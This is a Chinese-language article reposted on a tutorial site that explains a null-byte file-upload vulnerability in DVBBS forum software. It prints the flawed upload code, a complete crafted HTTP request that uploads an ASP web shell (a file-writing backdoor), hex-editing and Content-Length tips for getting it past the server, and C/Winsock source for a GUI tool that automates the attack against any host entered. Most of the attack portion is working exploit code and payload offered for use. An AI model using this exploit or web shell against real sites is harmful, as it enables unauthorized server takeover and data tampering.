明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

動(dòng)網(wǎng)論壇上傳文件漏洞的原理以及攻擊的代碼完成

發(fā)表時(shí)間:2024-02-05 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]最近一段時(shí)間比較忙,沒什么時(shí)間為組織做貢獻(xiàn)(實(shí)在是沒實(shí)力,呵呵).剛好前一段時(shí)間聽小豬(豬蛋兒的《目前流行的BBS安全性比較》一文請參閱:http://wvw.ttian.net/forum/viewtopic.php?id=269)說動(dòng)網(wǎng)論壇出了一個(gè)上傳任意文件的漏洞,當(dāng)時(shí)沒怎么明白.但是我看到...

          最近一段時(shí)間比較忙,沒什么時(shí)間為組織做貢獻(xiàn)(實(shí)在是沒實(shí)力,呵呵).剛好前一段時(shí)間聽小豬(豬蛋兒的《目前流行的BBS安全性比較》一文請參閱:http://wvw.ttian.net/forum/viewtopic.php?id=269)說動(dòng)網(wǎng)論壇出了一個(gè)上傳任意文件的漏洞,當(dāng)時(shí)沒怎么明白.但是我看到最近NB論壇上全部都在討論有關(guān)這方面的問題,就研究了一下,發(fā)現(xiàn)這個(gè)漏洞確實(shí)存在,而且非常嚴(yán)重,用小豬的話說是DVBBS7.0 SP2以下通殺.雖然有些人已經(jīng)知道了攻擊方法,但是還是存在一些問題.下面我就動(dòng)網(wǎng)的這個(gè)漏洞做一下講解.(不知道會(huì)不會(huì)被人罵,因?yàn)檫@個(gè)漏洞實(shí)在太大了).

  我們先看一下動(dòng)網(wǎng)論壇上傳文件的相關(guān)代碼:

'===========無組件上傳(upload_0)====================
sub upload_0()
set upload=new UpFile_Class ''建立上傳對象
upload.GetDate (int(Forum_Setting(56))*1024)  '取得上傳數(shù)據(jù),不限大小
iCount=0

if upload.err > 0 then
  select case upload.err
  case 1
  Response.Write "請先選擇你要上傳的文件[ <a href=# onclick=history.go(-1)>重新上傳</a> ]"
  case 2
  Response.Write "圖片大小超過了限制 "&Forum_Setting(56)&"K[ <a href=# onclick=history.go(-1)>重新上傳</a> ]"
  end select
  exit sub
  else
formPath=upload.form("filepath")
''在目錄后加(/)
if right(formPath,1)<>"/" then formPath=formPath&"/"

for each formName in upload.file ''列出所有上傳了的文件
set file=upload.file(formName) ''生成一個(gè)文件對象
if file.filesize<100 then
  response.write "請先選擇你要上傳的圖片[ <a href=# onclick=history.go(-1)>重新上傳</a> ]"
  response.end
end if

fileExt=lcase(file.FileExt)
if CheckFileExt(fileEXT)=false then
  response.write "文件格式不正確[ <a href=# onclick=history.go(-1)>重新上傳</a> ]"
  response.end
end if

randomize
ranNum=int(90000*rnd)+10000
filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
if file.FileSize>0 then     ''如果 FileSize > 0 說明有文件數(shù)據(jù)
 file.SaveToFile Server.mappath(filename)  ''保存文件
' response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 成功!<br>"
response.write "<script>parent.document.forms[0].myface.value='"&FileName&"'</script>"
 iCount=iCount+1
end if
set file=nothing
next
set upload=nothing
session("upface")="done"
Htmend iCount&" 個(gè)文件上傳結(jié)束!"

end if
end sub

在上面代碼中可以看到這樣一句:
filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
這里,filename是保存的文件名,它是依照上傳時(shí)間來命名的,最后擴(kuò)展名是表單中提交過來的文件的擴(kuò)展名.但是程序中對提交文件的類型做了限制,顯然想直接上傳ASP文件是不可行的.但是我們來看一下做為后輟的依據(jù)從哪里來的呢?我們可以在reg_upload.asp中找到這樣的代碼:
<form name="form" method="post" action="upfile.asp" enctype="multipart/form-data" >
<input type="hidden" name="filepath" value="uploadFace">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="Submit" value="上傳" onclick="fname.value=file1.value,parent.document.forms[0].Submit.disabled=true,
parent.document.forms[0].Submit2.disabled=true;">
</form>
這樣,我們知道了,程序是提取file1表單和fname表單中的值來做判斷的.也就是說直接從頁面遞交我們的ASP文件也是行不通了,但是,如果是我們自己構(gòu)造數(shù)據(jù)包的話就不一樣了.欲望之翼提出的方法就是自已構(gòu)造數(shù)據(jù)包來達(dá)到欺騙的目的.將提交的file1表單和fname表單項(xiàng)的值改成合法的文件名稱.這樣就可以繞過文件類型的檢測了.

當(dāng)然,主要的問題不在這里,如果我們只是要上傳那些代碼的話,我們完全可以直接改文件名就好了.我們的目的是要讓我們上傳的文件名改成ASP,這樣我們才可以利用.關(guān)鍵就在這一句了:
formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
這句話將一段字符串合并起來.我們能改的就是formPath這個(gè)參數(shù).在計(jì)算機(jī)中檢測字符串的關(guān)鍵就是看是否碰到'\0'字符,如果是,則認(rèn)為字符串結(jié)束了.也就是說我們在構(gòu)造上傳文件保存路徑時(shí),只要欺騙計(jì)算機(jī),讓他認(rèn)為類似"uploadface\zwell.asp"這樣的路徑參數(shù)已經(jīng)結(jié)束了,這樣,后面一連串的時(shí)間字符我們都可以不要,從而達(dá)到直接將文件保存為我們定義的文件名的目的.因些,我們要做的是在構(gòu)造的數(shù)據(jù)包中,將表單中的filepath改成類似uploadface\zwell.asp'\0'的字符串然后發(fā)送出去就行了.

我們先來看一下數(shù)據(jù)包的格式(論壇上好像大家用的是WSockExpert,不過我用的是IRIS,我覺得更專業(yè)一點(diǎn),^_^):


POST /forum/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705)
Host: uyee.com
Content-Length: 1593
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF

-----------------------------7d4a325500d2
Content-Disposition: form-data; name="filepath"

uploadFace\zwell.asp
-----------------------------7d4a325500d2
Content-Disposition: form-data; name="act"

upload
-----------------------------7d4a325500d2
Content-Disposition: form-data; name="file1"; filename="C:\1.gif"
Content-Type: text/plain

<%dim objFSO%>
<%dim fdata%>
<%dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%if err =0 then%>
<%response.write "<font color=red>save Success!</font>"%>
<%else%>
<%response.write "<font color=red>Save UnSuccess!</font>"%>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<%Response.write "<form action='''' method=post>"%>
<%Response.Write "<input type=text name=syfdpath width=32 size=50>"%>
<%Response.Write "<br>"%>
<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
<%Response.write "<br>"%>
<%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%>
<%Response.write "<input type=submit value=save>"%>
<%Response.write "</form>"%>
-----------------------------7d4a325500d2
Content-Disposition: form-data; name="fname"

C:\1.gif
-----------------------------7d4a325500d2
Content-Disposition: form-data; name="Submit"

上傳
-----------------------------7d4a325500d2--

上面的數(shù)據(jù)我是在WIN2003下調(diào)試的.按我前面講的,只要改幾個(gè)地方就好了
1.Content-Disposition: form-data; name="file1"; filename="C:\1.gif"
2.Content-Disposition: form-data; name="fname"

 C:\1.gif
3.最重要的地方:uploadFace\zwell.asp,怎么加一個(gè)空字符呢?用UltraEdit是個(gè)好方法,用16進(jìn)制編輯,(因?yàn)?\0'這個(gè)字符也占一個(gè)位置,所以我們先打入一空格,然后再在UltraEdit里將對就空格符的20改成00).

至于,最前面的那一段,直接從抓包工具中提取就是了.而且隨便一個(gè)都行.但是最重要的是要注意這一句:
Content-Length: 1593
很多人測試都沒成功,就因?yàn)檫@個(gè)值設(shè)的不對,其實(shí)這個(gè)值很好算,是從第一個(gè)"-----------------------------7d4a325500d2"開始算起,到"-----------------------------7d4a325500d2--\r\n\r\n"截止,大家看到的"\r\n"是起換行作用,占兩個(gè)字符.我看論壇上大家論壇時(shí)都是說加一個(gè)字符值就加一,不是說不對,只是還要這樣數(shù),代碼短倒無所謂,代碼要是很長怎么辦呢?:),這里告訴大家一個(gè)簡單的方法:打開記事本,將算長度的代碼復(fù)制到記事本,保存,然后看屬性就一目了然了,一個(gè)字符都不會(huì)錯(cuò).只是有一點(diǎn)必須注意,必須將最后的那幾個(gè)換行也復(fù)制進(jìn)來.很多人就是因?yàn)闆]有復(fù)制換行才失敗的.

寫了這么多,我們也看到,每一個(gè)這樣改太不方便,做了工具是必須的了,呵呵,具體不多說了,部分代碼如下:
#include <winsock2.h>
#include <stdio.h>
#include "Resource.h"

#pragma  comment(lib,"ws2_32.lib")

HINSTANCE    g_hInst;
HWND      g_hWnd;
HWND      m_up;
HWND      m_host;
HWND      m_webpath;
HWND      m_path;
HWND      m_filename;
HWND      m_upload;
DWORD      m_theadid;
BYTE      sendbuf[10000];
char      host[80];      //主機(jī)地址
char      bbspath[50];    //論壇地址
char      uppath[20];      //上傳目錄
char      upfilename[50];    //上傳文件名
char      upfiledata[8000];  //上傳文件內(nèi)容
int        sendsize;      //總傳送數(shù)據(jù)大小
int        realsndsize = 0;  //傳送頁面文件的大小
char      snddata[8000];
char      mm[1000]=
          "<%dim objFSO%>\r\n"
          "<%dim fdata%>\r\n"
          "<%dim objCountFile%>\r\n"
          "<%on error resume next%>\r\n"
          "<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n"
          "<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n"
          "<%fdata = request(\"cyfddata\")%>\r\n"
          "<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n"
          "<%objCountFile.Write fdata%>\r\n"
          "<%if err =0 then%>\r\n"
          "<%response.write \"<font color=red>save Success!</font>\"%>\r\n"
          "<%else%>"
          "<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n"
          "<%end if%>\r\n"
          "<%err.clear%>\r\n"
          "<%end if%>"
          "<%objCountFile.Close%>\r\n"
          "<%Set objCountFile=Nothing%>\r\n"
          "<%Set objFSO = Nothing%>"
          "<%Response.write \"<form action=\'\' method=post>\"%>\r\n"
          "<%Response.Write \"<input type=text name=syfdpath width=32 size=50>\"%>\r\n"
          "<%Response.Write \"<br>\"%>\r\n"
          "<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n"
          "<%Response.write \"<br>\"%>\r\n"
          "<%Response.write \"<textarea name=cyfddata cols=80 rows=10 width=32></textarea>\"%>\r\n"
          "<%Response.write \"<input type=submit value=save>\"%>\r\n"
          "<%Response.write \"</form>\"%>\r\n";

//獲得控件文本
char *gettext(HWND chwnd)
{
  char tmpbuf[10000];
  SendMessage(chwnd, WM_GETTEXT, (WPARAM)sizeof(tmpbuf), (LPARAM)tmpbuf);
  return tmpbuf;
}

//設(shè)置控件文本
void settext(HWND chwnd,char *text)
{
  SendMessage(chwnd, WM_SETTEXT, (WPARAM)(0), (LPARAM)text);
}

char *itos(int data)
{
  char tmp[10];
  sprintf(tmp, "%d", data);
  return tmp;
}

//上傳線程
DWORD WINAPI uploadthread(LPVOID param)
{
  SOCKET    s;
  sockaddr_in sin;
  struct hostent * hp;
  unsigned int  addr;

  s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

  ZeroMemory((void *)&sin, sizeof(sin));
  
  hp = gethostbyname(gettext(m_host));
  if (!hp)
    addr = inet_addr(gettext(m_host));
  if ((!hp) && (addr == INADDR_NONE) )
  {
    MessageBox(g_hWnd, "Unable to resolve host", "sendbuf", MB_OK);
    return 0;
  }
  if (hp != NULL)
    memcpy(&(sin.sin_addr),hp->h_addr,hp->h_length);
  else
    sin.sin_addr.s_addr = addr;

  sin.sin_port = htons(80);
  sin.sin_family = AF_INET;

  strcpy(host, gettext(m_host));
  strcpy(bbspath, gettext(m_webpath));
  strcpy(upfiledata, gettext(m_upload));
  strcpy(uppath, gettext(m_path));
  strcpy(upfilename, gettext(m_filename));

  realsndsize = 578 + strlen(uppath) + strlen(upfilename) + strlen(upfiledata) + 1;

  sprintf((char *)sendbuf, "POST %s/upfile.asp HTTP/1.1\r\n"
        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"
        "Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp\r\n"
        "Accept-Language: zh-cn\r\n"
        "Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\n"
        "Host: %s\r\n"
        "Content-Length: %d\r\n"
        "Connection: Keep-Alive\r\n"
        "Cache-Control: no-cache\r\n"
        "Cookie: iscookies=0; BoardList=BoardID=Show; ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF\r\n\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"filepath\"\r\n\r\n"
        "%s\\%s",
        bbspath,
        host,
        realsndsize,
        uppath,
        upfilename);

  sendsize = strlen((char *)sendbuf);
  sendbuf[sendsize] = '\0';

  sprintf(snddata,
        "\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"act\"\r\n\r\n"
        "upload\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"file1\"; filename=\"C:\\1.gif\"\r\n"
        "Content-Type: text/plain\r\n\r\n"
        "%s\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"fname\"\r\n\r\n"
        "C:\\1.gif\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n"
        "上傳\r\n"
        "-----------------------------7d4a325500d2--\r\n\r\n",
        upfiledata);

  strcat((char *)&sendbuf[sendsize+1], snddata);

  sendsize += strlen(snddata);
  sendsize += 1;

  if(SOCKET_ERROR == connect(s, (struct sockaddr *)&sin, sizeof(sin)))
  {
    MessageBox(g_hWnd, "連接出錯(cuò)!", "出錯(cuò)提示:", MB_OK MB_ICONERROR);
    return 0;
  }
  int sendsz = send(s, (char *)sendbuf, sendsize, 0);
  if(sendsz <= 0)
    MessageBox(g_hWnd, "發(fā)送數(shù)據(jù)失敗", itos(WSAGetLastError()), MB_OK);
  char recvbuf[10000];
  recv(s, (char*)recvbuf, 10000, 0);
  settext(m_upload, recvbuf);
  closesocket(s);
  return 0;
}

void WINAPI  On_Command(WPARAM wParam)
{
  switch (LOWORD(wParam))
  {
    case ID_UP:
      CreateThread(NULL, 0, uploadthread, NULL, NULL, &m_theadid);
      break;
    case IDCANCEL:
      SendMessage(g_hWnd, WM_CLOSE, (WPARAM)(NULL), LPARAM(NULL));
      break;
  }
}

static BOOL  CALLBACK MainDlgProc(HWND hWndDlg, UINT msg,  WPARAM wParam, LPARAM lParam)
{
  switch (msg)
  {
    case WM_INITDIALOG:
      g_hWnd = hWndDlg;
      m_up = GetDlgItem(g_hWnd, ID_UP);
      m_host = GetDlgItem(g_hWnd, IDC_EDIT1);
      m_webpath = GetDlgItem(g_hWnd, IDC_EDIT2);
      m_path = GetDlgItem(g_hWnd, IDC_EDIT3);
      m_upload = GetDlgItem(g_hWnd, IDC_EDIT4);
      m_filename = GetDlgItem(g_hWnd, IDC_EDIT5);
      settext(m_host, "192.168.10.101");
      settext(m_webpath, "/");
      settext(m_path, "uploadface");
      settext(m_filename, "zwell.asp");
      settext(m_upload, mm);
      return TRUE;

    case WM_COMMAND:
      On_Command(wParam);
      break;
  
    case WM_SIZE:
      break;

    case WM_CLOSE:
      EndDialog(g_hWnd,0);
      break;
  }
  return FALSE;
}

int  APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE  hPrevInstance, LPSTR lpCmdLine,  int  nCmdShow)
{
  WSADATA  wsaData;
  
  g_hInst=hInstance;
  if(WSAStartup(MAKEWORD(1, 1), &wsaData))
  {
    MessageBox(NULL,"無法初始化  Winsock  DLL\t","錯(cuò)誤",MB_OK MB_ICONSTOP);
    return 0;
  }
  DialogBox(g_hInst, MAKEINTRESOURCE(IDD_DIALOG1),  NULL, (DLGPROC)  MainDlgProc);
  WSACleanup();
  return 1;
}

WINDOWS2003 + VC.NET
WINDOWS2003 WINDOWS2000測試通過

(出處:viphot)